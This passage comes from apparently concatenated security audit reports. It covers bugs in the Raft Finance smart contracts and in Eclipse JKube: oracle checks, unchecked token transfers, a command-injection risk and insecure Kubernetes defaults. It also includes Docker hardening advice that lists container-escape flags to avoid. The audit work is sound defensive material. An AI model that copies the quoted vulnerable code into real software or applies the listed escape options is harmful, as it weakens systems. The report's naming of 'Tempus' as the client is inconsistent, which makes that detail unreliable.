A latent or future bug in Solidity compiler optimizations causes a security vulnerability in the Raft Finance contracts.
Recommendations
Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug.
Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.
+2. Issues with Chainlink oracle's return data validation Severity: Low Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-2 Target: contracts/Oracles/ChainlinkPriceOracle.sol
Description
Chainlink oracles are used to compute the price of a collateral token throughout the protocol. When validating the oracle's return data, the returned price is compared to the price of the previous round. However, there are a few issues with the validation:
● The currentRoundId value is not guaranteed to increase by exactly one across rounds; the only requirement is that the roundID increases monotonically.
● The updatedAt value in the oracle response is never checked, so potentially stale data could be coming from the priceAggregator contract.
● The roundId and answeredInRound values in the oracle response are not checked for equality; equality would indicate that the answer returned by the oracle is fresh.
function _badChainlinkResponse(ChainlinkResponse memory response) internal view returns (bool) {
    return !response.success
        || response.roundId == 0
        || response.timestamp == 0
        || response.timestamp > block.timestamp
        || response.answer <= 0;
}
Figure 2.1: The Chainlink oracle response validation logic
Exploit Scenario
The Chainlink oracle attempts to compare the current returned price to the price in the previous roundID. However, because the roundID did not increase by one from the previous round to the current round, the request fails, and the price oracle returns a failure. A stale price is then used by the protocol.
Recommendations
Short term, have the code validate that the timestamp value is greater than 0 to ensure that the data is fresh. Also, have the code check that the roundID and answeredInRound values are equal to ensure that the returned answer is not stale. Lastly, check that the timestamp value is not decreasing from round to round.
Long term, carefully investigate oracle integrations for potential footguns in order to conform to correct API usage.
References
● The Historical-Price-Feed-Data Project
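A hedged sketch of the recommended checks, extending the validation from figure 2.1; the two-argument form, the prevResponse parameter, and the answeredInRound field are assumptions for illustration, not the actual Raft implementation:
function _badChainlinkResponse(
    ChainlinkResponse memory response,
    ChainlinkResponse memory prevResponse
) internal view returns (bool) {
    return !response.success
        || response.roundId == 0
        || response.timestamp == 0
        || response.timestamp > block.timestamp
        || response.answer <= 0
        // A fresh answer must come from the round that was queried.
        || response.answeredInRound != response.roundId
        // Round data must not move backward in time.
        || response.timestamp < prevResponse.timestamp;
}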
+3. Incorrect constant for 1000-year periods Severity: Informational Difficulty: High Type: Configuration Finding ID: TOB-RAFT-3 Target: contracts/Dependencies/MathUtils.sol
Description
The Raft Finance contracts rely on computing the exponential decay to determine the correct base rate for redemptions. In the MathUtils library, a period of 1000 years is chosen as the maximum time period for the decay exponent to prevent an overflow. However, the _MINUTES_IN_1000_YEARS constant used is currently incorrect:
/// @notice Number of minutes in 1000 years.
uint256 internal constant _MINUTES_IN_1000_YEARS = 1000 * 356 days / 1 minutes;
Figure 3.1: The declaration of the _MINUTES_IN_1000_YEARS constant
Recommendations
Short term, change the code to compute the _MINUTES_IN_1000_YEARS constant as 1000 * 365 days / 1 minutes.
Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the system. Integrate Echidna and smart contract fuzzing in the system to triangulate subtle arithmetic issues.
+4. Inconsistent use of safeTransfer for collateralToken Severity: Medium Difficulty: Medium Type: Data Validation Finding ID: TOB-RAFT-4 Target: PositionManager.sol, PositionManagerStETH.sol
Description
The Raft contracts rely on ERC-20 tokens as collateral that must be deposited in order to mint R tokens. However, although the SafeERC20 library is used for collateral token transfers, there are a few places where the safeTransfer function is missing:
● The transfer of collateralToken in the liquidate function in the PositionManager contract:
if (!isRedistribution) {
    rToken.burn(msg.sender, entirePositionDebt);
    _totalDebt -= entirePositionDebt;
    emit TotalDebtChanged(_totalDebt);
    // Collateral is sent to protocol as a fee only in case of liquidation
    collateralToken.transfer(feeRecipient, collateralLiquidationFee);
}
collateralToken.transfer(msg.sender, collateralToSendToLiquidator);
Figure 4.1: Unchecked transfers in PositionManager.liquidate
● The transfer of stETH in the managePositionStETH function in the PositionManagerStETH contract:
{
    if (isCollateralIncrease) {
        stETH.transferFrom(msg.sender, address(this), collateralChange);
        stETH.approve(address(wstETH), collateralChange);
        uint256 wstETHAmount = wstETH.wrap(collateralChange);
        _managePosition( ... );
    } else {
        _managePosition( ... );
        uint256 stETHAmount = wstETH.unwrap(collateralChange);
        stETH.transfer(msg.sender, stETHAmount);
    }
}
Figure 4.2: Unchecked transfers in PositionManagerStETH.managePositionStETH
Exploit Scenario
Governance approves an ERC-20 token that returns a Boolean on failure to be used as collateral. However, since the return values of this ERC-20 token are not checked, Alice, a liquidator, does not receive any collateral for performing a liquidation.
Recommendations
Short term, use the SafeERC20 library's safeTransfer function for the collateralToken.
Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol.
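For concreteness, a sketch of the short-term fix for the transfers in figure 4.1, assuming using SafeERC20 for IERC20; is in scope (as the finding notes, the library is already used elsewhere in the contracts):
// safeTransfer reverts on a false return value or other nonstandard failure,
// instead of silently ignoring it.
collateralToken.safeTransfer(feeRecipient, collateralLiquidationFee);
...
collateralToken.safeTransfer(msg.sender, collateralToSendToLiquidator);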
+5. Tokens may be trapped in an invalid position Severity: Informational Difficulty: High Type: Denial of Service Finding ID: TOB-RAFT-5 Target: PositionManager.sol
Description
The Raft Finance contracts allow users to take out positions by depositing collateral and minting a corresponding amount of R tokens as debt. In order to exit a position, a user must pay back their debt, which allows them to receive their collateral back. To check that a position is closed, the _managePosition function contains a branch that validates that the position's debt is zero after adjustment. However, if the position's debt is zero but there is still some collateral present even after adjustment, then the position is considered invalid and cannot be closed. This could be problematic, especially if some dust is present in the position after the collateral is withdrawn.
if (positionDebt == 0) {
    if (positionCollateral != 0) {
        revert InvalidPosition();
    }
    // position was closed, remove it
    _closePosition(collateralToken, position, false);
} else {
    _checkValidPosition(collateralToken, positionDebt, positionCollateral);
    if (newPosition) {
        collateralTokenForPosition[position] = collateralToken;
        emit PositionCreated(position);
    }
}
Figure 5.1: A snippet from the _managePosition function showing that a position with no debt cannot be closed if any amount of collateral remains
Exploit Scenario
Alice, a borrower, wants to pay back her debt and receive her collateral in exchange. However, she accidentally leaves some collateral in her position despite paying back all her debt. As a result, her position cannot be closed.
Recommendations
Short term, if a position's debt is zero, have the _managePosition function refund any excess collateral and close the position.
Long term, carefully investigate potential edge cases in the system and use smart contract fuzzing to determine if those edge cases can be realistically reached.
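A hedged sketch of the recommended behavior in _managePosition, refunding dust instead of reverting; names follow figure 5.1, and the refund recipient and transfer helper are assumptions for illustration:
if (positionDebt == 0) {
    if (positionCollateral != 0) {
        // Refund leftover collateral to the position owner instead of
        // reverting with InvalidPosition, so the position can still be closed.
        collateralToken.safeTransfer(position, positionCollateral);
    }
    // position was closed, remove it
    _closePosition(collateralToken, position, false);
}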
+6. Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price Severity: Informational Difficulty: High Type: Data Validation Finding ID: TOB-RAFT-6 Target: TellorPriceOracle.sol
Description
The Raft Finance contracts rely on oracles to compute the price of the collateral tokens used throughout the codebase. If the Chainlink oracle is down, the Tellor oracle is used as a backup. However, the Tellor oracle does not use the stETH/USD price feed. Instead, it uses the ETH/USD price feed to determine the price of stETH. This could be problematic if stETH depegs, which can occur during black swan events.
function _getCurrentTellorResponse() internal view returns (TellorResponse memory tellorResponse) {
    uint256 count;
    uint256 time;
    uint256 value;
    try tellor.getNewValueCountbyRequestId(ETHUSD_TELLOR_REQ_ID) returns (uint256 count_) {
        count = count_;
    } catch {
        return (tellorResponse);
    }
Figure 6.1: The Tellor oracle fetching the price of ETH to determine the price of stETH
Exploit Scenario
Alice has a position in the system. A significant black swan event causes the depeg of staked Ether. As a result, the Tellor oracle returns an incorrect price, which prevents Alice's position from being liquidated despite being eligible for liquidation.
Recommendations
Short term, carefully monitor the Tellor oracle, especially during any sort of market volatility.
Long term, investigate the robustness of the oracles and document possible circumstances that could cause them to return incorrect prices.
+7. Incorrect constant value for MAX_REDEMPTION_SPREAD Severity: Medium Difficulty: Low Type: Configuration Finding ID: TOB-RAFT-7 Target: PositionManager.sol
Description
The Raft protocol allows a user to redeem their R tokens for underlying wstETH at any time. By doing so, the protocol ensures that it maintains overcollateralization. The redemption spread is part of the redemption rate, which changes based on the price of the R token to incentivize or disincentivize redemption. However, the documentation says that the maximum redemption spread should be 100% and that the protocol will initially set it to 100%. In the code, the MAX_REDEMPTION_SPREAD constant is set to 2%, and the redemptionSpread variable is set to 1% at construction. This is problematic because setting the rate to 100% is necessary to effectively disable redemptions at launch.
uint256 public constant override MIN_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 10_000 * 25; // 0.25%
uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT / 100 * 2; // 2%
Figure 7.1: Constants specifying the minimum and maximum redemption spread percentages
constructor(ISplitLiquidationCollateral newSplitLiquidationCollateral) FeeCollector(msg.sender) {
    rToken = new RToken(address(this), msg.sender);
    raftDebtToken = new ERC20Indexable(
        address(this),
        string(bytes.concat("Raft ", bytes(IERC20Metadata(address(rToken)).name()), " debt")),
        string(bytes.concat("r", bytes(IERC20Metadata(address(rToken)).symbol()), "-d"))
    );
    setRedemptionSpread(MathUtils._100_PERCENT / 100);
    setSplitLiquidationCollateral(newSplitLiquidationCollateral);
    emit PositionManagerDeployed(rToken, raftDebtToken, msg.sender);
}
Figure 7.2: The redemption spread being set to 1% instead of 100% in the PositionManager's constructor
Exploit Scenario
The protocol sets the redemption spread to 2%. Alice, a borrower, redeems her R tokens for some underlying wstETH, despite the developers' intentions. As a result, the stablecoin experiences significant volatility.
Recommendations
Short term, set the MAX_REDEMPTION_SPREAD value to 100% and set the redemptionSpread variable to MAX_REDEMPTION_SPREAD in the PositionManager contract's constructor.
Long term, improve unit test coverage to identify incorrect behavior and edge cases in the protocol.
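To make the short-term recommendation concrete, a sketch of the corrected declarations, mirroring figures 7.1 and 7.2 (only the changed lines are shown; the rest of the constructor is assumed unchanged):
// Allow the spread to be configured all the way up to 100%...
uint256 public constant override MAX_REDEMPTION_SPREAD = MathUtils._100_PERCENT; // 100%
...
// ...and start at the maximum so that redemptions are effectively disabled at launch.
setRedemptionSpread(MAX_REDEMPTION_SPREAD);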
+8. Liquidation rewards are calculated incorrectly Severity: Medium Difficulty: Low Type: Data Validation Finding ID: TOB-RAFT-8 Target: SplitLiquidationCollateral.sol
Description
Whenever a position's collateralization ratio falls between 100% and 110%, the position becomes eligible for liquidation. A liquidator can pay off the position's total debt to restore solvency. In exchange, the liquidator receives a liquidation reward for removing bad debt, in addition to the amount of debt the liquidator has paid off. However, the calculation performed in the split function is incorrect and does not reward the liquidator with the matchingCollateral amount of tokens:
function split(
    uint256 totalCollateral,
    uint256 totalDebt,
    uint256 price,
    bool isRedistribution
) external pure returns (uint256 collateralToSendToProtocol, uint256 collateralToSentToLiquidator) {
    if (isRedistribution) {
        ...
    } else {
        uint256 matchingCollateral = totalDebt.divDown(price);
        uint256 excessCollateral = totalCollateral - matchingCollateral;
        uint256 liquidatorReward = excessCollateral.mulDown(_calculateLiquidatorRewardRate(totalDebt));
        collateralToSendToProtocol = excessCollateral - liquidatorReward;
        collateralToSentToLiquidator = liquidatorReward;
    }
}
Figure 8.1: The calculations for how to split the collateral between the liquidator and the protocol, showing that the matchingCollateral is omitted from the liquidator's reward
Exploit Scenario
Alice, a liquidator, attempts to liquidate an insolvent position. However, upon liquidation, she receives only the liquidationReward amount of tokens, without the matchingCollateral. As a result, her liquidation is unprofitable and she has lost funds.
Recommendations
Short term, have the code compute the collateralToSendToLiquidator variable as liquidationReward + matchingCollateral.
Long term, improve unit test coverage to uncover edge cases and ensure intended behavior throughout the protocol.
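As a sketch of the intended fix, with names following figure 8.1 (the redistribution branch and the surrounding contract are assumed unchanged):
} else {
    uint256 matchingCollateral = totalDebt.divDown(price);
    uint256 excessCollateral = totalCollateral - matchingCollateral;
    uint256 liquidatorReward = excessCollateral.mulDown(_calculateLiquidatorRewardRate(totalDebt));
    collateralToSendToProtocol = excessCollateral - liquidatorReward;
    // The liquidator receives the collateral matching the debt they repaid
    // in addition to the reward, so liquidations remain profitable.
    collateralToSentToLiquidator = matchingCollateral + liquidatorReward;
}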
A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Category Description
Access Controls Insufficient authorization or assessment of rights
Auditing and Logging Insufficient auditing of actions or logging of problems
Authentication Improper identification of users
Configuration Misconfigured servers, devices, or software components
Cryptography A breach of system confidentiality or integrity
Data Exposure Exposure of sensitive information
Data Validation Improper reliance on the structure or values of data
Denial of Service A system failure with an availability impact
Error Reporting Insecure or insufficient reporting of error conditions
Patching Use of an outdated software package or library
Session Management Improper identification of authenticated users
Testing Insufficient test methodology or test coverage
Timing Race conditions or other order-of-operations flaws
Undefined Behavior Undefined behavior triggered within the system
Severity Levels
Severity Description
Informational The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined The extent of the risk was not determined during this engagement.
Low The risk is small or is not one the client has indicated is important.
Medium User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Difficulty Description
Undetermined The difficulty of exploitation was not determined during this engagement.
Low The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium An attacker must write an exploit or will need in-depth knowledge of the system.
High An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Category Description
Arithmetic The proper use of mathematical operations and semantics
Auditing The use of event auditing and logging to support monitoring
Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Decentralization The presence of a decentralized governance structure for mitigating insider threats and managing risks posed by contract upgrades
Documentation The presence of comprehensive and readable codebase documentation
Front-Running Resistance The system's resistance to front-running attacks
Low-Level Manipulation The justified use of inline assembly and low-level calls
Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Rating Description
Strong No issues were found, and the system exceeds industry standards.
Satisfactory Minor issues were found, but the system is compliant with best practices.
Moderate Some issues that may affect system safety were found.
Weak Many issues that affect system safety were found.
Missing A required component is missing, significantly affecting system safety.
Not Applicable The category is not applicable to this review.
Not Considered The category was not considered in this review.
Further Investigation Required Further investigation is required to reach a meaningful conclusion.
C. Code Quality Recommendations
The following recommendations are not associated with specific vulnerabilities. However, they enhance code readability and may prevent the introduction of future vulnerabilities.
● Fix incorrect comments. The comment below refers to the secondary oracle, not the primary oracle.
// If primary oracle is broken or frozen, both oracles are untrusted, and return last good price
if (secondaryOracleResponse.isBrokenOrFrozen) {
    return lastGoodPrice;
}
Figure C.1: The comment in the fetchPrice function (PriceFeed.sol#L70–L73)
● Declare variables once to avoid unnecessary storage reads.
uint256 icr = MathUtils._computeCR(
    raftCollateralTokens[collateralToken].token.balanceOf(position),
    raftDebtToken.balanceOf(position),
    price
);
if (icr >= MathUtils.MCR) {
    revert NothingToLiquidate();
}
uint256 entirePositionDebt = raftDebtToken.balanceOf(position);
uint256 entirePositionCollateral = raftCollateralTokens[collateralToken].token.balanceOf(position);
Figure C.2: The multiple storage reads in the liquidate function (PositionManager.sol#L175–L183)
D. Fix Review Results
When undertaking a fix review, Trail of Bits reviews the fixes implemented for issues identified in the original report. This work involves a review of specific areas of the source code and system configuration, not comprehensive analysis of the system.
On May 10, 2022, Trail of Bits reviewed the fixes and mitigations implemented by the Raft team for the issues identified in this report. We reviewed each fix to determine its effectiveness in resolving the associated issue. In summary, of the eight issues described in this report, Tempus has resolved seven issues and has not resolved the remaining issue. For additional information, please see the Detailed Fix Review Results below.
ID Title Severity Status
1 Solidity compiler optimizations can be problematic Informational Unresolved
2 Issues with Chainlink oracle's return data validation Low Resolved
3 Incorrect constant for 1000-year periods Informational Resolved
4 Inconsistent use of safeTransfer for collateralToken Medium Resolved
5 Tokens may be trapped in an invalid position Informational Resolved
6 Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price Informational Resolved
7 Incorrect constant value for MAX_REDEMPTION_SPREAD Medium Resolved
8 Liquidation rewards are calculated incorrectly Medium Resolved
Detailed Fix Review Results
TOB-RAFT-1: Solidity compiler optimizations can be problematic
Unresolved.
TOB-RAFT-2: Issues with Chainlink oracle's return data validation
Resolved in PR #281. The Raft team added checks to catch whether the roundID and answeredInRound values do not match, as well as additional validation of the timestamp response. These checks cover cases of invalid responses from Chainlink. However, the validation logic still assumes roundIDs always increment by 1 between valid rounds. This is not guaranteed to be true, especially when the underlying aggregator is updated (i.e., when the phaseID in the proxy, which is incorporated into the most significant bytes of the roundID, is incremented). This would result in the PriceFeed temporarily falling back to the secondary oracle until the next round data is available from the Chainlink oracle, despite receiving a valid response.
The infrequency of Chainlink upgrades and graceful oracle fallback and recovery make it unlikely that this edge case will impact system availability.
TOB-RAFT-3: Incorrect constant for 1000-year periods
Resolved in PR #275. The constant was updated to the correct value.
TOB-RAFT-4: Inconsistent use of safeTransfer for collateralToken
Resolved in PR #265. The PositionManager contract has been updated to use the safeERC20 library's safeTransfer function for collateralToken transfers. Calls to stETH.transferFrom were not updated, but this is not necessary because the contract is specific to stETH and its semantics are known.
TOB-RAFT-5: Tokens may be trapped in an invalid position
Resolved in PR #264 and PR #267. The managePosition function (name altered during fix review) now correctly closes a position when all the debt is repaid.
TOB-RAFT-6: Price deviations between stETH and ETH may cause Tellor oracle to return an incorrect price
Resolved in PR #279. The Tellor oracle has been updated to fetch the stETH price directly instead of assuming stETH/ETH parity.
TOB-RAFT-7: Incorrect constant value for MAX_REDEMPTION_SPREAD
Resolved in PR #263. The constants for the redemption spread have been updated to the correct values.
TOB-RAFT-8: Liquidation rewards are calculated incorrectly
Resolved in PR #246. Liquidations now correctly return the matched collateral and the liquidator reward to the liquidator.
diff --git a/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt b/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt
new file mode 100644
index 0000000..cc046df
--- /dev/null
+++ b/findings_newupdate/tob/2023-05-eclipse-jkube-securityreview.txt
@@ -0,0 +1,3 @@
+1. Insecure defaults in generated artifacts Severity: Informational Difficulty: Undetermined Type: Configuration Finding ID: TOB-JKUBE-1 Target: Artifacts generated by JKube
Description
JKube can generate Kubernetes deployment artifacts and deploy applications using those artifacts. By default, many of the security features offered by Kubernetes are not enabled in these artifacts. This can cause the deployed applications to have more permissions than their workload requires. If such an application were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, some of which are documented in appendix E. Similarly, the generated artifacts do not employ some best practices, such as referencing container images by hash, which could help prevent certain supply chain attacks.
We compiled several of the examples contained in the quickstarts folder and analyzed them. We observed instances of the following problems in the artifacts produced by JKube:
● Pods have no associated network policies.
● Dockerfiles have base image references that use the latest tag.
● Container image references use the latest tag, or no tag, instead of a named tag or a digest.
● Resource (CPU, memory) limits are not set.
● Containers do not have the allowPrivilegeEscalation setting set.
● Containers are not configured to use a read-only filesystem.
● Containers run as the root user and have privileged capabilities.
● Seccomp profiles are not enabled on containers.
● Service account tokens are mounted on pods where they may not be needed.
Exploit Scenario
An attacker compromises one application running on a Kubernetes cluster.
The attacker takes advantage of the lax security configuration to move laterally and attack other system components.
Recommendations
Short term, improve the default generated configuration to enhance the security posture of applications deployed using JKube, while maintaining compatibility with most common scenarios. Apply automatic tools such as Checkov during development to review the configuration generated by JKube and identify areas for improvement.
Long term, implement mechanisms in JKube to allow users to configure more advanced security features in a convenient way.
References
● Appendix D: Docker Recommendations
● Appendix E: Hardening Containers Run via Kubernetes
+2. Risk of command line injection from secret Severity: Low Difficulty: Medium Type: Data Validation Finding ID: TOB-JKUBE-2 Target: jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/springboot/watcher/SpringBootWatcher.java
Description
As part of the Spring Boot watcher functionality, JKube executes a second Java process. The command line for this process interpolates an arbitrary secret, making it unsafe. This command line is then tokenized by separating on spaces. If the secret contains spaces, this process could allow an attacker to add arbitrary arguments and command-line flags and modify the behavior of this command execution.
StringBuilder buffer = new StringBuilder("java -cp ");
(...)
buffer.append(" -Dspring.devtools.remote.secret=");
buffer.append(remoteSecret);
buffer.append(" org.springframework.boot.devtools.RemoteSpringApplication ");
buffer.append(url);
try {
    String command = buffer.toString();
    log.debug("Running: " + command);
    final Process process = Runtime.getRuntime().exec(command);
Figure 2.1: A secret is used without sanitization on a command string that is then executed. (jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/springboot/watcher/SpringBootWatcher.java#136–171)
Exploit Scenario
An attacker forks an open source project that uses JKube and Spring Boot, improves it in some useful way, and introduces a malicious spring.devtools.remote.secret secret in application.properties. A user then finds this forked project and sets it up locally. When the user runs mvn k8s:watch, JKube invokes a command that includes attacker-controlled content, compromising the user's machine.
Recommendations
Short term, rewrite the command-line building code to use an array of arguments instead of a single command-line string. Java provides several variants of the exec method, such as exec(String[]), which are safer to use when user-provided input is involved.
Long term, integrate static analysis tools in the development process and CI/CD pipelines, such as Semgrep and CodeQL, to detect instances of similar problems early on. Review uses of user-controlled input to ensure they are sanitized if necessary and processed safely.
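A hedged sketch of the array-based variant; classpath stands in for however the original code computes the -cp value, and the surrounding class is omitted. Because each argument is a discrete array element, a secret containing spaces can no longer introduce extra arguments:
String[] command = new String[] {
    "java",
    "-cp", classpath,
    // The secret stays a single argument even if it contains spaces.
    "-Dspring.devtools.remote.secret=" + remoteSecret,
    "org.springframework.boot.devtools.RemoteSpringApplication",
    url
};
final Process process = Runtime.getRuntime().exec(command);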
A. Vulnerability Categories
The following tables describe the vulnerability categories, severity levels, and difficulty levels used in this document.
Vulnerability Categories
Category Description
Access Controls Insufficient authorization or assessment of rights
Auditing and Logging Insufficient auditing of actions or logging of problems
Authentication Improper identification of users
Configuration Misconfigured servers, devices, or software components
Cryptography A breach of system confidentiality or integrity
Data Exposure Exposure of sensitive information
Data Validation Improper reliance on the structure or values of data
Denial of Service A system failure with an availability impact
Error Reporting Insecure or insufficient reporting of error conditions
Patching Use of an outdated software package or library
Session Management Improper identification of authenticated users
Testing Insufficient test methodology or test coverage
Timing Race conditions or other order-of-operations flaws
Undefined Behavior Undefined behavior triggered within the system
Severity Levels
Severity Description
Informational The issue does not pose an immediate risk but is relevant to security best practices.
Undetermined The extent of the risk was not determined during this engagement.
Low The risk is small or is not one the client has indicated is important.
Medium User information is at risk; exploitation could pose reputational, legal, or moderate financial risks.
High The flaw could affect numerous users and have serious reputational, legal, or financial implications.
Difficulty Levels
Difficulty Description
Undetermined The difficulty of exploitation was not determined during this engagement.
Low The flaw is well known; public tools for its exploitation exist or can be scripted.
Medium An attacker must write an exploit or will need in-depth knowledge of the system.
High An attacker must have privileged access to the system, may need to know complex technical details, or must discover other weaknesses to exploit this issue.
B. Code Maturity Categories
The following tables describe the code maturity categories and rating criteria used in this document.
Code Maturity Categories
Category Description
Arithmetic The proper use of mathematical operations and semantics
Auditing The use of event auditing and logging to support monitoring
Authentication / Access Controls The use of robust access controls to handle identification and authorization and to ensure safe interactions with the system
Complexity Management The presence of clear structures designed to manage system complexity, including the separation of system logic into clearly defined functions
Configuration The configuration of system components in accordance with best practices
Cryptography and Key Management The safe use of cryptographic primitives and functions, along with the presence of robust mechanisms for key generation and distribution
Data Handling The safe handling of user inputs and data processed by the system
Documentation The presence of comprehensive and readable codebase documentation
Maintenance The timely maintenance of system components to mitigate risk
Memory Safety and Error Handling The presence of memory safety and robust error-handling mechanisms
Testing and Verification The presence of robust testing procedures (e.g., unit tests, integration tests, and verification methods) and sufficient test coverage
Rating Criteria
Rating Description
Strong No issues were found, and the system exceeds industry standards.
Satisfactory Minor issues were found, but the system is compliant with best practices.
Moderate Some issues that may affect system safety were found.
Weak Many issues that affect system safety were found.
Missing A required component is missing, significantly affecting system safety.
Not Applicable The category is not applicable to this review.
Not Considered The category was not considered in this review.
Further Investigation Required Further investigation is required to reach a meaningful conclusion.
C. Non-Security-Related Findings
The following recommendations are not associated with specific vulnerabilities. However, implementing them may enhance code readability and may prevent the introduction of vulnerabilities in the future.
● The following if condition is always true. i is always less than objects.length; otherwise, the for loop would not be executing. The developer likely intended to use ++i instead of i++.
for (int i = 0; i < objects.length; ) {
    sb.append(objects[i]);
    if (i++ < objects.length) {
        sb.append(joinWith);
    }
}
Figure C.1: This if condition is always true. (jkube/kube-kit/build/api/src/test/java/org/eclipse/jkube/kit/build/api/helper/PathTestUtil.java#69–74)
● The AssemblyManager singleton may not work as expected on multi-threaded environments. Consider making the initialization synchronized.
public static AssemblyManager getInstance() {
    if (dockerAssemblyManager == null) {
        dockerAssemblyManager = new AssemblyManager();
    }
    return dockerAssemblyManager;
}
Figure C.2: This initialization is not thread-safe. (jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/build/api/assembly/AssemblyManager.java#81–86)
● The following format string call has more arguments than format specifiers.
throw new DockerAccessException(e, "Unable to add tag [%s] to image [%s]", targetImage, sourceImage, e);
Figure C.3: This format string has an extra argument. (jkube/jkube-kit/build/service/docker/src/main/java/org/eclipse/jkube/kit/build/service/docker/access/hc/DockerAccessWithHcClient.java#476–477)
● The following issue appears to be fixed upstream. Consider removing the workaround or adjusting the comment if it is still desirable to keep Prometheus disabled.
// Switch off Prometheus agent until logging issue with WildFly Swarm is resolved
// See:
// - https://github.com/fabric8io/fabric8-maven-plugin/issues/1173
// - https://issues.jboss.org/browse/THORN-1859
ret.put("AB_PROMETHEUS_OFF", "true");
ret.put("AB_OFF", "true");
Figure C.4: The code references an upstream issue that has been resolved. (jkube/jkube-kit/jkube-kit-thorntail-v2/src/main/java/org/eclipse/jkube/thorntail/v2/generator/ThorntailV2Generator.java#41–46)
● The parsedCredentials array is indexed without first being checked to ensure that it has enough elements. This may cause the program to fail. This code is repeated in jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/build/api/auth/RegistryAuth.java.
public static AuthConfig fromCredentialsEncoded(String credentialsEncoded, String email) {
    final String credentials = new String(Base64.decodeBase64(credentialsEncoded));
    final String[] parsedCredentials = credentials.split(":", 2);
    return AuthConfig.builder()
        .username(parsedCredentials[0])
        .password(parsedCredentials[1])
        .email(email)
        .build();
}
Figure C.5: parsedCredentials may have a single element in the array. (jkube/jkube-kit/build/api/src/main/java/org/eclipse/jkube/kit/build/api/auth/AuthConfig.java#89–97)
● The spring.devtools.remote.secret secret is logged as part of the printed command. This might not represent a security issue, as this particular secret is also stored in plaintext, but as a general practice, privileged information should not be logged.
log.debug("Running: " + command);
Figure C.6: The command string contains the mentioned secret. (jkube/jkube-kit/jkube-kit-spring-boot/src/main/java/org/eclipse/jkube/springboot/watcher/SpringBootWatcher.java#170)
● There are several occurrences across the codebase of parseInt calls on user input without adequate error handling. An invalid input on a user-provided property may cause JKube to throw an exception.
D. Docker Recommendations
This appendix provides general recommendations regarding the use of Docker. We recommend using the steps listed under the "Basic Security" and "Limiting Container Privileges" sections and avoiding the options listed under the "Options to Avoid" section. This appendix also describes the Linux features that form the basis of Docker container security measures and includes a list of additional references.
Basic Security
● Do not add users to the docker group. Inclusion in the docker group allows a user to escalate his or her privileges to root without authentication.
● Do not run containers as a root user. If user namespaces are not used, the root user within the container will be the real root user on the host. Instead, create another user within the Docker image and set the container user by using the USER instruction in the image's Dockerfile specification.
Alternatively, pass in the --user $UID:$GID flag to the docker run command to set the user and user group.
● Do not use the --privileged flag. Using this flag allows the process within the container to access all host resources, hijacking the machine.
● Do not mount the Docker daemon socket (usually /var/run/docker.sock) into the container. A user with access to the Docker daemon socket will be able to spawn a privileged container to "escape" the container and access host resources.
● Carefully weigh the risks inherent in mounting volumes from special filesystems such as /proc or /sys into a container. If a container has write access to the mounted paths, a user may be able to gain information about the host machine or escalate his or her own privileges.
Limiting Container Privileges
● Pass the --cap-drop=all flag to the docker run command to drop all Linux capabilities, and enable only those capabilities that are necessary to the process within a container using the --cap-add=... flag. Note, though, that adding capabilities could allow the process to escalate its privileges and "escape" the container.
● Pass the --security-opt=no-new-privileges:true flag to the docker run command to prevent processes from gaining additional privileges.
● Limit the resources provided to a container process to prevent denial-of-service scenarios.
● Do not use root (uid=0 or gid=0) in a container if it is not needed. Use USER ... in the Dockerfile (or use docker run --user $UID:$GID ...).
The following recommendations are optional:
● Use user namespaces to limit the user and group IDs available in the container to only those that are mapped from the host to the container.
● Adjust the Seccomp and AppArmor profiles to further limit container privileges.
● Consider using SELinux instead of AppArmor to gain additional control over the operations a given container can execute.
Options to Avoid
Flag Description
--privileged Gives all kernel capabilities to the container and lifts all the limitations enforced by the device cgroup controller (i.e., allowing the container to do almost everything that the host can do)
--cap-add=all Adds all Linux capabilities
--security-opt apparmor=unconfined Disables AppArmor
--security-opt seccomp=unconfined Disables Seccomp
--device-cgroup-rule='a *:* rwm' Enables access to all devices (according to this documentation)
--pid=host Uses the host PID namespace
--uts=host Uses the host UTS namespace
--network=host Uses the host network namespace, which grants access to all network interfaces available on a host
Linux Features Foundational to Docker Container Security
Feature Description
Namespaces This feature is used to isolate or limit the view (and therefore the use) of a global system resource. There are various namespaces, such as PID, network, mount, UTS, IPC, user, and cgroup, each of which wraps a different resource. For example, if a process creates a new PID namespace, the process will act as if its PID is 1 and will not be able to send signals to processes created in its parent namespace. The namespaces to which a process belongs are listed in the /proc/$PID/ns/ directory (each with its own ID) and can also be accessed by using the lsns tool.
Control groups (cgroups) This is a mechanism for grouping processes/tasks into hierarchical groups and metering or limiting resources within those groups, such as memory, CPUs, I/Os, or networks. The cgroups to which a process belongs can be read from the /proc/$PID/cgroup file.
